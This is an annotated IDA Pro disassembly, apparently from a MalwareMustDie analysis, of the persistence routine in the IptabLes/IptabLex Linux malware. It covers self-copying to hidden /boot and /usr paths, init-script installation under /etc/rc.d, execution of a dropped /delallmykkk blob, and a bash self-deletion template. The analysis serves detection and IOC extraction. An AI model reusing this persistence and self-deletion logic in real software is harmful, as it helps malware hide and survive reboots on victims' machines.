- ;; Installation of the Autostart Scripts reversed | #MalwareMustDie - @unixfreaxjp /malware/Iptablex]$ date
- ;; Mon Jun 16 14:09:52 JST 2014
- // Installation of autostarts...
- ;; initsrv() -- persistence installer of the IptabLes/IptabLex sample, as listed by IDA Pro.
- ;; 32-bit x86, cdecl: every call below first stores its arguments at [esp] (arg0), [esp+4] (arg1), ...
- ;; What the visible code does, in order:
- ;;   1. writes a 4FCh-byte blob (delallfile) to /delallmykkk and, if WriteToFile() reports 1, runs it via system();
- ;;   2. copies the file named by the string at 81333C4h (not shown in this listing; presumably the running
- ;;      binary's own path -- confirm) to the first of /boot/.IptabLes, /usr/.IptabLes, /.IptabLes where the
- ;;      copy "sticks", using system("cp %s %s>/dev/null") and comparing Get_File_Size() of source and
- ;;      destination; the chosen path is kept in g_mainsrvinfo+1DCh and the other candidates are tied to it
- ;;      with CreatPeLink() (a link helper; its argument order is not visible here -- confirm);
- ;;   3. chmod()s the copy, builds a three-line "#!/bin/sh" wrapper that runs it, and writes that wrapper to
- ;;      the first of /etc/rc.d/init.d/IptabLes, /etc/rc.d/IptabLes, /boot/IptabLes (or a fourth path at
- ;;      80B38BBh, not shown) where WriteToFile() reports 1, again linking the other names to it;
- ;;   4. startallfile(<wrapper path>), then rundelmecmd() (self-deletion, see delmecmd further down); returns 0.
- ;; Every path/filename above is a usable host IOC. The four strlen() calls were inlined by the compiler as
- ;; the classic 01010101h/80808080h zero-byte scan; each one is marked where it starts.
- .text:0804CED0 public initsrv
- .text:0804CED0 initsrv proc near
- .text:0804CED0
- .text:0804CED0 var_228 = dword ptr -228h ; outgoing arg0
- .text:0804CED0 var_224 = dword ptr -224h ; outgoing arg1
- .text:0804CED0 var_220 = dword ptr -220h ; outgoing arg2
- .text:0804CED0 var_21C = dword ptr -21Ch ; outgoing arg3
- .text:0804CED0 var_20C = dword ptr -20Ch ; 100h-byte buffer B (edi): init-script text
- .text:0804CED0 var_10C = dword ptr -10Ch ; 100h-byte buffer A (esi): "cp" command line, later the wrapper path
- .text:0804CED0 var_108 = dword ptr -108h
- .text:0804CED0 var_104 = dword ptr -104h
- .text:0804CED0 var_100 = dword ptr -100h
- .text:0804CED0 var_FC = dword ptr -0FCh
- .text:0804CED0 var_F8 = dword ptr -0F8h
- .text:0804CED0 var_F4 = word ptr -0F4h
- .text:0804CED0
- .text:0804CED0 push ebp
- .text:0804CED1 mov ebp, esp
- .text:0804CED3 push edi
- .text:0804CED4 push esi
- .text:0804CED5 push ebx ; ebx survives calls: holds a file size below
- .text:0804CED6 sub esp, 21Ch ; pathname
- .text:0804CEDC lea esi, [ebp+var_10C] ; esi = buffer A
- .text:0804CEE2 lea edi, [ebp+var_20C] ; edi = buffer B
- .text:0804CEE8 mov [esp+228h+var_220], 100h ; memset(bufA, 0, 100h)
- .text:0804CEF0 mov [esp+228h+var_224], 0
- .text:0804CEF8 mov [esp+228h+var_228], esi
- .text:0804CEFB call memset
- .text:0804CF00 mov [esp+228h+var_220], 100h ; memset(bufB, 0, 100h)
- .text:0804CF08 mov [esp+228h+var_224], 0
- .text:0804CF10 mov [esp+228h+var_228], edi
- .text:0804CF13 call memset
- .text:0804CF18 mov dword ptr ds:g_mainsrvinfo+1DCh, offset xmfilea ; offset contains "/boot/.IptabLes" -- install candidate #1
- .text:0804CF22 mov [esp+228h+var_220], offset aDelallmykkk ; <=-contains "/delallmykkk" -- WriteToFile(delallfile, 4FCh, "/delallmykkk")
- .text:0804CF2A mov [esp+228h+var_224], 4FCh ; 4FCh = 1276 bytes of embedded payload
- .text:0804CF32 mov [esp+228h+var_228], offset delallfile
- .text:0804CF39 call WriteToFile
- .text:0804CF3E sub eax, 1
- .text:0804CF41 jz loc_804D37D ; eax == 1 (write succeeded, presumably) -> run /delallmykkk, then come back to loc_804CF47
- .text:0804CF47
- .text:0804CF47 loc_804CF47:
- .text:0804CF47 mov eax, dword ptr ds:g_mainsrvinfo+1DCh ; eax = current install candidate
- .text:0804CF4C mov [esp+228h+var_220], 81333C4h ; source path string (unnamed by the analyst; not shown here)
- .text:0804CF54 mov [esp+228h+var_224], offset aCpSSDevNull ; DB contains "cp %s %s>/dev/null"
- .text:0804CF5C mov [esp+228h+var_228], esi
- .text:0804CF5F mov [esp+228h+var_21C], eax
- .text:0804CF63 call sprintf ; sprintf(bufA, "cp %s %s>/dev/null", <81333C4h>, "/boot/.IptabLes")
- .text:0804CF68 mov [esp+228h+var_228], esi
- .text:0804CF6B call system ; shells out; paths are unquoted, so this is a detectable "sh -c cp ..." child
- .text:0804CF70 mov eax, dword ptr ds:g_mainsrvinfo+1DCh
- .text:0804CF75 mov [esp+228h+var_228], eax
- .text:0804CF78 call Get_File_Size ; size of the destination copy
- .text:0804CF7D mov [esp+228h+var_228], 81333C4h
- .text:0804CF84 mov ebx, eax
- .text:0804CF86 call Get_File_Size ; size of the source
- .text:0804CF8B cmp ebx, eax
- .text:0804CF8D jz loc_804D2C0 ; sizes match -> copy accepted; link /usr/.IptabLes to it and go to chmod
- .text:0804CF93 mov dword ptr ds:g_mainsrvinfo+1DCh, offset xmfileb ; <--"/usr/.IptabLes" -- candidate #2
- .text:0804CF9D mov [esp+228h+var_220], 100h ; memset(bufA, 0, 100h)
- .text:0804CFA5 mov [esp+228h+var_224], 0
- .text:0804CFAD mov [esp+228h+var_228], esi
- .text:0804CFB0 call memset
- .text:0804CFB5 mov eax, dword ptr ds:g_mainsrvinfo+1DCh
- .text:0804CFBA mov [esp+228h+var_220], 81333C4h
- .text:0804CFC2 mov [esp+228h+var_224], offset aCpSSDevNull ; <--"cp %s %s>/dev/null"
- .text:0804CFCA mov [esp+228h+var_228], esi
- .text:0804CFCD mov [esp+228h+var_21C], eax
- .text:0804CFD1 call sprintf ; same cp command, destination now "/usr/.IptabLes"
- .text:0804CFD6 mov [esp+228h+var_228], esi
- .text:0804CFD9 call system
- .text:0804CFDE mov eax, dword ptr ds:g_mainsrvinfo+1DCh
- .text:0804CFE3 mov [esp+228h+var_228], eax
- .text:0804CFE6 call Get_File_Size
- .text:0804CFEB mov [esp+228h+var_228], 81333C4h
- .text:0804CFF2 mov ebx, eax
- .text:0804CFF4 call Get_File_Size
- .text:0804CFF9 cmp ebx, eax
- .text:0804CFFB jz loc_804D325 ; sizes match -> link /boot/.IptabLes to it and go to chmod
- .text:0804D001 mov dword ptr ds:g_mainsrvinfo+1DCh, offset xmfilec ; <--- "/.IptabLes" -- candidate #3 (last resort, no size check afterwards)
- .text:0804D00B mov [esp+228h+var_220], 100h ; memset(bufA, 0, 100h)
- .text:0804D013 mov [esp+228h+var_224], 0
- .text:0804D01B mov [esp+228h+var_228], esi
- .text:0804D01E call memset
- .text:0804D023 mov eax, dword ptr ds:g_mainsrvinfo+1DCh
- .text:0804D028 mov [esp+228h+var_220], 81333C4h
- .text:0804D030 mov [esp+228h+var_224], offset aCpSSDevNull ; <---"cp %s %s>/dev/null"
- .text:0804D038 mov [esp+228h+var_228], esi
- .text:0804D03B mov [esp+228h+var_21C], eax
- .text:0804D03F call sprintf ; destination now "/.IptabLes"
- .text:0804D044 mov [esp+228h+var_228], esi
- .text:0804D047 call system
- .text:0804D04C mov eax, dword ptr ds:g_mainsrvinfo+1DCh
- .text:0804D051 mov [esp+228h+var_224], offset xmfilea ; <---"/boot/.IptabLes" -- CreatPeLink("/.IptabLes", "/boot/.IptabLes")
- .text:0804D059 mov [esp+228h+var_228], eax
- .text:0804D05C call CreatPeLink
- .text:0804D061 mov eax, dword ptr ds:g_mainsrvinfo+1DCh
- .text:0804D066 mov [esp+228h+var_224], offset xmfileb ; <---"/usr/.IptabLes" -- CreatPeLink("/.IptabLes", "/usr/.IptabLes")
- .text:0804D06E mov [esp+228h+var_228], eax
- .text:0804D071 call CreatPeLink
- .text:0804D076
- .text:0804D076 loc_804D076: ; all three copy paths converge here
- .text:0804D076 mov eax, dword ptr ds:g_mainsrvinfo+1DCh
- .text:0804D07B mov [esp+228h+var_224], 309h ; 309h = 777 DECIMAL = mode 01411 (sticky, u=r, g=x, o=x), not 0777 (1FFh); looks like a decimal-vs-octal slip in the original source -- confirm
- .text:0804D083 mov [esp+228h+var_228], eax
- .text:0804D086 call chmod ; chmod(<install path>, 309h)
- .text:0804D08B mov [esp+228h+var_220], 100h ; memset(bufA, 0, 100h)
- .text:0804D093 mov [esp+228h+var_224], 0
- .text:0804D09B mov [esp+228h+var_228], esi
- .text:0804D09E call memset
- .text:0804D0A3 mov eax, dword ptr ds:g_mainsrvinfo+1DCh
- .text:0804D0A8 mov [esp+228h+var_224], offset srvfile ; <--- "#!/bin/sh\n%s\nexit 0\n" -- init-script wrapper that runs the install path
- .text:0804D0B0 mov [esp+228h+var_228], edi
- .text:0804D0B3 mov [esp+228h+var_220], eax
- .text:0804D0B7 call sprintf ; sprintf(bufB, srvfile, <install path>)
- .text:0804D0BC mov ecx, edi ; ecx = cursor for the inlined strlen(bufB)
- .text:0804D0BE
- .text:0804D0BE loc_804D0BE: : cross reff initserv() ; inlined strlen #1: scan a dword at a time for a zero byte
- .text:0804D0BE mov eax, [ecx]
- .text:0804D0C0 add ecx, 4
- .text:0804D0C3 lea edx, [eax-1010101h] ; (x - 01010101h) & ~x & 80808080h != 0 iff some byte of x is zero
- .text:0804D0C9 not eax
- .text:0804D0CB and edx, eax
- .text:0804D0CD and edx, 80808080h
- .text:0804D0D3 jz short loc_804D0BE
- .text:0804D0D5 test edx, 8080h ; zero byte in the low half of the dword?
- .text:0804D0DB jnz short loc_804D0E3
- .text:0804D0DD shr edx, 10h ; no: it is in the high half, move the flag bits down and step past 2 bytes
- .text:0804D0E0 add ecx, 2
- .text:0804D0E3
- .text:0804D0E3 loc_804D0E3: : cross reff initserv()
- .text:0804D0E3 add dl, dl ; CF = 1 iff the zero byte is the first of the pair
- .text:0804D0E5 sbb ecx, 3 ; ecx -= 3 + CF  -> ecx = address of the NUL
- .text:0804D0E8 sub ecx, edi ; ecx = strlen(bufB)
- .text:0804D0EA mov [esp+228h+var_224], ecx
- .text:0804D0EE mov [esp+228h+var_220], offset aEtcRc_dInit_dI ; <---"/etc/rc.d/init.d/IptabLes" -- script location #1
- .text:0804D0F6 mov [esp+228h+var_228], edi
- .text:0804D0F9 call WriteToFile ; WriteToFile(bufB, len, "/etc/rc.d/init.d/IptabLes")
- .text:0804D0FE mov ecx, edi ; pre-set the cursor for the next strlen, does not touch eax
- .text:0804D100 sub eax, 1
- .text:0804D103 jz loc_804D250 ; written -> esi = "/etc/rc.d/init.d/IptabLes", link the other two names to it
- .text:0804D109
- .text:0804D109 loc_804D109: : cross reff initserv() ; inlined strlen #2 (same idiom)
- .text:0804D109 mov eax, [ecx]
- .text:0804D10B add ecx, 4
- .text:0804D10E lea edx, [eax-1010101h]
- .text:0804D114 not eax
- .text:0804D116 and edx, eax
- .text:0804D118 and edx, 80808080h
- .text:0804D11E jz short loc_804D109
- .text:0804D120 test edx, 8080h
- .text:0804D126 jz loc_804D230 ; high-half tail, elided from this listing ([...] below); presumably shr/add like loc_804D33F
- .text:0804D12C
- .text:0804D12C loc_804D12C: : cross reff initserv()
- .text:0804D12C add dl, dl
- .text:0804D12E sbb ecx, 3
- .text:0804D131 sub ecx, edi
- .text:0804D133 mov [esp+228h+var_224], ecx
- .text:0804D137 mov [esp+228h+var_220], offset aEtcRc_dIptable ; <---"/etc/rc.d/IptabLes" -- script location #2
- .text:0804D13F mov [esp+228h+var_228], edi
- .text:0804D142 call WriteToFile
- .text:0804D147 mov ecx, edi
- .text:0804D149 sub eax, 1
- .text:0804D14C jz loc_804D2E0 ; written -> esi = "/etc/rc.d/IptabLes", link the others to it
- .text:0804D152
- .text:0804D152 loc_804D152: : cross reff initserv() ; inlined strlen #3
- .text:0804D152 mov eax, [ecx]
- .text:0804D154 add ecx, 4
- .text:0804D157 lea edx, [eax-1010101h]
- .text:0804D15D not eax
- .text:0804D15F and edx, eax
- .text:0804D161 and edx, 80808080h
- .text:0804D167 jz short loc_804D152
- .text:0804D169 test edx, 8080h
- .text:0804D16F jz loc_804D240 ; high-half tail, elided from this listing
- .text:0804D175
- .text:0804D175 loc_804D175: : cross reff initserv()
- .text:0804D175 add dl, dl
- .text:0804D177 sbb ecx, 3
- .text:0804D17A sub ecx, edi
- .text:0804D17C mov [esp+228h+var_224], ecx
- .text:0804D180 mov [esp+228h+var_220], offset aBootIptables ; <---"/boot/IptabLes" -- script location #3
- .text:0804D188 mov [esp+228h+var_228], edi
- .text:0804D18B call WriteToFile
- .text:0804D190 mov ecx, edi
- .text:0804D192 sub eax, 1
- .text:0804D195 jz loc_804D34A ; written -> esi = "/boot/IptabLes", link the others to it
- .text:0804D19B
- .text:0804D19B loc_804D19B: : cross reff initserv() ; inlined strlen #4
- .text:0804D19B mov eax, [ecx]
- .text:0804D19D add ecx, 4
- .text:0804D1A0 lea edx, [eax-1010101h]
- .text:0804D1A6 not eax
- .text:0804D1A8 and edx, eax
- .text:0804D1AA and edx, 80808080h
- .text:0804D1B0 jz short loc_804D19B
- .text:0804D1B2 test edx, 8080h
- .text:0804D1B8 jz loc_804D33F
- .text:0804D1BE
- .text:0804D1BE loc_804D1BE: : cross reff initserv()
- .text:0804D1BE add dl, dl
- .text:0804D1C0 sbb ecx, 3
- .text:0804D1C3 sub ecx, edi
- .text:0804D1C5 mov [esp+228h+var_220], 80B38BBh ; script location #4: .rodata string not resolved in this listing -- unknown path
- .text:0804D1CD mov [esp+228h+var_224], ecx
- .text:0804D1D1 mov [esp+228h+var_228], edi
- .text:0804D1D4 call WriteToFile ; return value is not checked on this last attempt
- .text:0804D1D9 mov [ebp+var_10C], 7470492Fh ; bufA = "/Ipt"
- .text:0804D1E3 mov [ebp+var_108], 654C6261h ;        "abLe"
- .text:0804D1ED mov word ptr [ebp+var_104], 73h ;     "s\0"  -> esi = "/IptabLes"
- .text:0804D1F6
- .text:0804D1F6 loc_804D1F6: : cross reff initserv() ; also reached from loc_804D34A with esi = "/boot/IptabLes"
- .text:0804D1F6 mov [esp+228h+var_224], offset aEtcRc_dInit_dI ; <--"/etc/rc.d/init.d/IptabLes" -- CreatPeLink(esi, ...)
- .text:0804D1FE mov [esp+228h+var_228], esi
- .text:0804D201 call CreatPeLink
- .text:0804D206 mov [esp+228h+var_224], offset aEtcRc_dIptable ; <--"/etc/rc.d/IptabLes" -- CreatPeLink(esi, ...)
- .text:0804D20E mov [esp+228h+var_228], esi
- .text:0804D211 call CreatPeLink
- .text:0804D216
- .text:0804D216 loc_804D216: : cross reff initserv() ; common exit: esi = path of the init script that was written
- .text:0804D216 mov [esp+228h+var_228], esi
- .text:0804D219 call startallfile ; startallfile(<script path>)
- .text:0804D21E call rundelmecmd ; self-deletion (delmecmd template below)
- .text:0804D223 add esp, 21Ch
- .text:0804D229 xor eax, eax ; return 0
- .text:0804D22B pop ebx
- .text:0804D22C pop esi
- .text:0804D22D pop edi
- .text:0804D22E pop ebp
- .text:0804D22F retn
- [...]
- .text:0804D250 loc_804D250: : cross reff initserv() ; script #1 written: esi = "/etc/rc.d/init.d/IptabLes"
- .text:0804D250 mov [ebp+var_10C], 6374652Fh ; "/etc"
- .text:0804D25A mov [ebp+var_108], 2E63722Fh ; "/rc."
- .text:0804D264 mov [ebp+var_104], 6E692F64h ; "d/in"
- .text:0804D26E mov [ebp+var_100], 642E7469h ; "it.d"
- .text:0804D278 mov [ebp+var_FC], 7470492Fh ; "/Ipt"
- .text:0804D282 mov [ebp+var_F8], 654C6261h ; "abLe"
- .text:0804D28C mov [ebp+var_F4], 73h ; "s\0"
- .text:0804D295 mov [esp+228h+var_224], offset aEtcRc_dIptable ; <---"/etc/rc.d/IptabLes"
- .text:0804D29D
- .text:0804D29D loc_804D29D: : cross reff initserv() ; shared tail: CreatPeLink(esi, <arg1 set by caller>) ; CreatPeLink(esi, "/boot/IptabLes")
- .text:0804D29D mov [esp+228h+var_228], esi
- .text:0804D2A0 call CreatPeLink
- .text:0804D2A5 mov [esp+228h+var_224], offset aBootIptables ; <---"/boot/IptabLes"
- .text:0804D2AD mov [esp+228h+var_228], esi
- .text:0804D2B0 call CreatPeLink
- .text:0804D2B5 jmp loc_804D216
- .text:0804D2C0
- .text:0804D2C0 loc_804D2C0: : cross reff initserv() ; copy #1 (/boot/.IptabLes) verified
- .text:0804D2C0 mov eax, dword ptr ds:g_mainsrvinfo+1DCh
- .text:0804D2C5 mov [esp+228h+var_224], offset xmfileb ; <---"/usr/.IptabLes" -- CreatPeLink("/boot/.IptabLes", "/usr/.IptabLes")
- .text:0804D2CD mov [esp+228h+var_228], eax
- .text:0804D2D0 call CreatPeLink
- .text:0804D2D5 jmp loc_804D076
- .text:0804D2DA align 10h
- .text:0804D2E0
- .text:0804D2E0 loc_804D2E0: : cross reff initserv() ; script #2 written: esi = "/etc/rc.d/IptabLes"
- .text:0804D2E0 mov [ebp+var_10C], 6374652Fh ; "/etc"
- .text:0804D2EA mov [ebp+var_108], 2E63722Fh ; "/rc."
- .text:0804D2F4 mov [ebp+var_104], 70492F64h ; "d/Ip"
- .text:0804D2FE mov [ebp+var_100], 4C626174h ; "tabL"
- .text:0804D308 mov word ptr [ebp+var_FC], 7365h ; "es"
- .text:0804D311 mov byte ptr [ebp+var_FC+2], 0 ; NUL
- .text:0804D318 mov [esp+228h+var_224], offset aEtcRc_dInit_dI ; <--"/etc/rc.d/init.d/IptabLes"
- .text:0804D320 jmp loc_804D29D
- .text:0804D325 loc_804D325: : cross reff initserv() ; copy #2 (/usr/.IptabLes) verified
- .text:0804D325 mov eax, dword ptr ds:g_mainsrvinfo+1DCh
- .text:0804D32A mov [esp+228h+var_224], offset xmfilea ; <--"/boot/.IptabLes" -- CreatPeLink("/usr/.IptabLes", "/boot/.IptabLes")
- .text:0804D332 mov [esp+228h+var_228], eax
- .text:0804D335 call CreatPeLink
- .text:0804D33A jmp loc_804D076
- .text:0804D33F
- .text:0804D33F loc_804D33F: : cross reff initserv() ; strlen #4, zero byte in the high half of the dword
- .text:0804D33F shr edx, 10h
- .text:0804D342 add ecx, 2
- .text:0804D345 jmp loc_804D1BE
- .text:0804D34A
- .text:0804D34A loc_804D34A: : cross reff initserv() ; script #3 written: esi = "/boot/IptabLes"
- .text:0804D34A mov [ebp+var_10C], 6F6F622Fh ; "/boo"
- .text:0804D354 mov [ebp+var_108], 70492F74h ; "t/Ip"
- .text:0804D35E mov [ebp+var_104], 4C626174h ; "tabL"
- .text:0804D368 mov word ptr [ebp+var_100], 7365h ; "es"
- .text:0804D371 mov byte ptr [ebp+var_100+2], 0 ; NUL
- .text:0804D378 jmp loc_804D1F6
- .text:0804D37D loc_804D37D: : cross reff initserv() ; /delallmykkk dropped successfully: execute it, then continue with the copy
- .text:0804D37D mov [esp+228h+var_228], offset aDelallmykkkDev ; <---"/delallmykkk>/dev/null"
- .text:0804D384 call system
- .text:0804D389 jmp loc_804CF47
- .text:0804D389 initsrv endp
- ;; delmecmd is the self-deletion script template; rundelmecmd(), called at the end of initsrv() above, fills it in and runs it.
- ;; Format string for the self-delete script: the two placeholders are filled by the caller (not shown here).
- ;; The sleeps give the launching process time to exit before it is killed and its file removed.
- .rodata:080B3E40 delmecmd db '#!/bin/bash',0Ah
- .rodata:080B3E40 db 'sleep 3',0Ah
- .rodata:080B3E40 db 'kill %d',0Ah ; %d = pid to kill (presumably the dropper's own pid -- confirm in rundelmecmd)
- .rodata:080B3E40 db 'sleep 1',0Ah
- .rodata:080B3E40 db 'rm -f %s',0Ah ; %s = file to remove (presumably the original binary -- confirm)
- .rodata:080B3E40 db 'rm -rf "$0"',0Ah,0 ; the script removes itself last
- .rodata:080B3E7A public rundelme
- .rodata:080B3E7A rundelme db 73h, 68h, 20h, 2Fh, 64h, 65h, 6Ch, 2 dup(78h), 2 dup(61h)